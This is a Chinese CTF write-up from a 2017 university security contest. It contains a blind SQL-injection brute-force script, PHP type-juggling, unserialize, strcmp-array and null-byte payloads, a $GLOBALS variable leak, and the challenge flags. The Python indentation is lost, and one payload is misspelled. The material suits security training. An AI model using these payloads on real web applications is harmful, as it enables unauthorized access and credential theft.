2017年高校网络信息安全管理运维挑战赛部分题解

Login

右键源代码提示 用户名是admin 密码是pwd字段 典型注入

试一下 发现全都过滤了，空格union select还有各种函数…

使用异或^构造payload:



（在我自己搭的环境里测试）发现可以

写脚本：

import requests
url = 'http://202.112.26.124:8080/fb69d7b4467e33c71b0153e62f7e2bf0/index.php'

s = requests.Session()

pwd=""

for i in range(1, 31):
for j in range(65,122):
payload = "admin'^(strcmp(left(right(pwd,"+str(i)+"),1),'"+chr(j)+"'))='1"
#print payload
data = {'uname':payload, 'pwd':'123'}
r = s.post(url,data)
#print r.content
if 'password' in r.content:
pwd += chr(j)
print payload
print pwd

print pwd[::-1]

随机数：

http://202.112.26.124:8080/280a31eec4c62a893ad40a6508d207c8/index.php.bak

备份文件泄露

审计源代码



只需要两个code相等即可

而SESSION[‘code’]的值在后文



发现就是一个随机数，打开burp抓包直接开跑

暴力跑code=?

快速计算

直接上脚本：

import re, requests
s = requests.Session()
url = 'http://202.120.7.220:2333/'
r = s.get(url)
c = r.content
num = re.findall(re.compile(r'br/>(.*?)=<input'), c)[0]
print num
data = {'v' : eval(num)}
print data
r = s.post(url, data = data)
print r.content

不是管理员也能登陆：

根据提示 打开帮助与说明



右键源代码：



思路很清晰了：用户名是0e开头的md5，密码是构造反序列化

搭环境试了一下



用户名：QNKCDZO

密码：a:2:{s:4:”name”;s:2:”XX”;s:3:”pwd”;s:2:”XX”;}

提交错误。。。这就很尴尬。所以感觉源码的XX并不是真正的XX

而且注意到是用的两个等于号 弱类型匹配，这就简单了，传0就行了

构造的密码为a:2:{s:4:”name”;i:0;s:3:”pwd”;i:0;}

过了

Easy crypto

审了一下题，需要将算法逆置。

代码如下：

# -*- coding: utf-8 -*-
def rc4(data,key):
j=0
s=range(256)
for i in range(256):
j=(j+s[i]+ord(key[i%len(key)]))%256
s[i],s[j]=s[j],s[i]
i=0
j=0
out=[]
for char in data:
i=(i+1)%256
j=(j+s[i])%256
s[i],s[j]=s[j],s[i]
out.append(chr(ord(char)^s[(s[i]+s[j])%256]))
return ''.join(out)
f = open('enc.txt', 'r')
r = f.read()
encodedata=rc4(r,'hello world')
print encodedata

PHP是最好的语言

2017年11月2日

19:37

初步观察

打开之后一片空白，但是在index.php后面添加.bak可以下载到源码，可以看出这个题目属于php代码审计类型

2. 查看源码，确定方案

看到源码中含有反序列化函数，应该是考察PHP的反序列化漏洞

通读一遍代码发现，只要满足v1，v2，v3都为1就可以显示flag

源码中有三个函数可以让v1,v2,v3为1，因此主要目标就是满足这三个函数的条件让这三个函数执行

3. 具体操作

a. V1函数

第一个if需要a是一个数组，所以a=array();Isnumeric判断a的param1是否为数字，是数字直接退出，不是数字的话不进行任何操作，我们需要a[param1]不是数字，下一个if中，a[param1]需要大于2017，v1才会被设置为1，看似这个条件与上一个a[param1]不是数字矛盾，但是php一个数字和一个字符串进行比较或者进行运算时，PHP会把字符串转换成数字再进行比较。PHP转换的规则的是：若字符串以数字开头，则取开头数字作为转换结果，若无则输出0。那么可以写一句a[“param1”]=”2018a”;,那么2018>2017可以使条件成立

b. V2函数

首先需要a[param2]是一个数组，那么应该想到数组嵌套数组，

看下一个if条件，得知，如果a[param2]长度不为5或者a[param2][0]为0那么就会退出，所以我们需要构造的条件就是：a[param2]长度为5，而且a[param2][0]不为0。

继续往下看，pos变量我们需要它返回为True，需要的条件为使用array_search函数时，a[param2]中与nudt有匹配的值，然而往下看在遍历a[param2]中的值的时候，需要全部与“nudt”不相等，看似矛盾，但是由于“nudt”字符串与数字进行比较时，php会将nudt变成0，所以需要a[param2]中有个0

综上，构造一句：a[“param2”]=array(array(1),1,2,3,0);综上对a的构造已经完毕，可以序列化输出a的值，然后写入url里，print(serialize(a))

c. V3函数

第一个if需要c[1]为真，第二个if需要c[1]和d进行strcmp比较为0，而c[1]不等于d,

由于低版本php的strcmp有个漏洞：非字符串进行比较时，将会直接返回0，所以可以考虑将c[1]构造成数组，即egg[]为二维数组

因此可以构造egg[1][]=11&d=1

eregi函数匹配d和c[0]拼接起来的字符串中是否有M或n或s，我们需要它返回假，

而下一个函数查找MyAns在c[0]和d组成的字符串中出现的位置，所以需要MyAns不仅存在，而且不能在第0位，综上考虑，采用00截断方式，

egg[0]=%00MyAns

这样当d和c[0]拼接的字符串进行匹配时，不会读取到%00之后的内容，

而c[0]和d拼接起来的字符串进行匹配时，则从能读取到。

从而可以让v3=1

最后结果

构造的的url：

http://202.112.26.124:8080/95fe19724cc6084f08366340c848b791/index.php/?foo=a:2:{s:6:”param1”;s:5:”2018a”;s:6:”param2”;a:5:{i:0;a:1:{i:0;i:1;}i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:0;}}&egg[0]=%00MyAns&egg[1][]=11&d=1

EIS{php_th3_b45t_l4ngu4g3}

文件上传

发现此题需要上传可执行php文件，但过滤掉了“<， ？”等一些特殊字符，需绕过，抓包传递数组

php代码审计

<?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}

其中preg_match正则表达式的 意思是，匹配字符串，\w表示字符+数字+下划线，*代表有若干个\w字符组成。如果不匹配会输出 ‘’args error!‘’\

而下一句的$$args,比较有意思。解析一下，PHP中变量可以当作另一个变量的变量名。

$GLOBALS：一个包含了全部变量的全局组合数组。

构造payloaｄ：?args=BLOBLAS

即可爆出所有变量，其中包含flag

array(7) { [“GLOBALS”]=> RECURSION [“_POST”]=> array(0) { } [“_GET”]=> array(1) { [“args”]=> string(7) “GLOBALS” } [“_COOKIE”]=> array(0) { } [“_FILES”]=> array(0) { } [“ZFkwe3”]=> string(38) “flag{92853051ab894a64f7865cf3c2128b34}” [“args”]=> string(7) “GLOBALS” }

隐藏在黑夜里的秘密

放到010编辑器里面，看出是伪加密 提取出两个文件

解压出来

flag.txt

bmp文件

图片分层后找到flag

php trick

右键查看源代码

很明显的变量覆盖漏洞

RVF{woshiflag}

提示里有被加密了，凯撒算法

Flag格式是eis

很容易知道移13位

eis{jbfuvsynt}